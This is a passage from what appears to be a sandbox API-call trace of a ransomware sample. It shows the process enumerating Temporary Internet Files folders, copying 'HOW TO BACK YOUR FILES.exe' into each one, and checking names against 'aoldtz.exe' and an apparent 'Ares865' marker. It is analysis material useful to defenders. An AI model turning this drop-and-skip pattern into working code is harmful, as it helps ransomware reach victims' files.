lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 0 [0042.432] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.432] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0042.432] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.432] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned 107 [0042.432] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.432] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.432] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.433] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.433] GetLastError () returned 0x0 [0042.433] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.433] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.433] CloseHandle (hObject=0x118) returned 1 [0042.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.433] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.433] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.433] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.433] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.433] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb08 | out: hHeap=0x2b0000) returned 1 [0042.434] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.434] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned 99 [0042.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.434] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.434] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.434] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.434] GetLastError () returned 0x0 [0042.434] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.434] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.434] CloseHandle (hObject=0x118) returned 1 [0042.434] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.435] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.435] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.435] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.435] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.435] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.435] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.435] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned 107 [0042.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0042.435] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.435] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.436] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.436] GetLastError () returned 0x0 [0042.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.436] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.436] CloseHandle (hObject=0x118) returned 1 [0042.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.436] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.436] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.436] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.436] lstrcpyW (in: lpString1=0x2e2e938, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.436] lstrlenW (lpString="desktop.ini") returned 11 [0042.436] lstrlenW (lpString="Ares865") returned 7 [0042.436] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.436] lstrcpyW (in: lpString1=0x2e2e938, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0042.436] lstrlenW (lpString="index.dat") returned 9 [0042.436] lstrlenW (lpString="Ares865") returned 7 [0042.436] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0042.437] lstrcpyW (in: lpString1=0x2e2e938, lpString2="MM5O9XQS" | out: lpString1="MM5O9XQS") returned="MM5O9XQS" [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xea) returned 0x2cba28 [0042.437] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0042.437] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMMR5K9K", cAlternateFileName="")) returned 1 [0042.437] lstrcmpiW (lpString1="PMMR5K9K", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.437] lstrcmpiW (lpString1="PMMR5K9K", lpString2="aoldtz.exe") returned 1 [0042.437] lstrcpyW (in: lpString1=0x2e2e938, lpString2="PMMR5K9K" | out: lpString1="PMMR5K9K") returned="PMMR5K9K" [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xea) returned 0x2cbb20 [0042.437] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.437] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIJUQL1C", cAlternateFileName="")) returned 1 [0042.437] lstrcmpiW (lpString1="RIJUQL1C", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.437] lstrcmpiW (lpString1="RIJUQL1C", lpString2="aoldtz.exe") returned 1 [0042.437] lstrcpyW (in: lpString1=0x2e2e938, lpString2="RIJUQL1C" | out: lpString1="RIJUQL1C") returned="RIJUQL1C" [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xea) returned 0x2cbdb0 [0042.437] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.437] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 1 [0042.437] lstrcmpiW (lpString1="X9OHK109", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.437] lstrcmpiW (lpString1="X9OHK109", lpString2="aoldtz.exe") returned 1 [0042.437] lstrcpyW (in: lpString1=0x2e2e938, lpString2="X9OHK109" | out: lpString1="X9OHK109") returned="X9OHK109" [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.437] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xea) returned 0x2cbea8 [0042.437] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.437] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 0 [0042.437] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.437] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.437] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbea8 | out: hHeap=0x2b0000) returned 1 [0042.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.438] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned 116 [0042.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.438] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.438] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.438] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.438] GetLastError () returned 0x0 [0042.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.438] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.438] CloseHandle (hObject=0x118) returned 1 [0042.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.439] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.439] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.439] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.439] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.439] lstrcpyW (in: lpString1=0x2e2e94a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.439] lstrlenW (lpString="desktop.ini") returned 11 [0042.439] lstrlenW (lpString="Ares865") returned 7 [0042.439] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.439] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.439] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.439] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 116 [0042.439] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.439] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.439] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.440] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.440] GetLastError () returned 0x0 [0042.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.440] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.440] CloseHandle (hObject=0x118) returned 1 [0042.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.440] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.440] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.440] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.440] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.440] lstrcpyW (in: lpString1=0x2e2e94a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.440] lstrlenW (lpString="desktop.ini") returned 11 [0042.440] lstrlenW (lpString="Ares865") returned 7 [0042.440] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.441] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.441] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb20 | out: hHeap=0x2b0000) returned 1 [0042.441] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.441] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 116 [0042.441] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.441] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.441] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.441] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.441] GetLastError () returned 0x0 [0042.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.441] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | 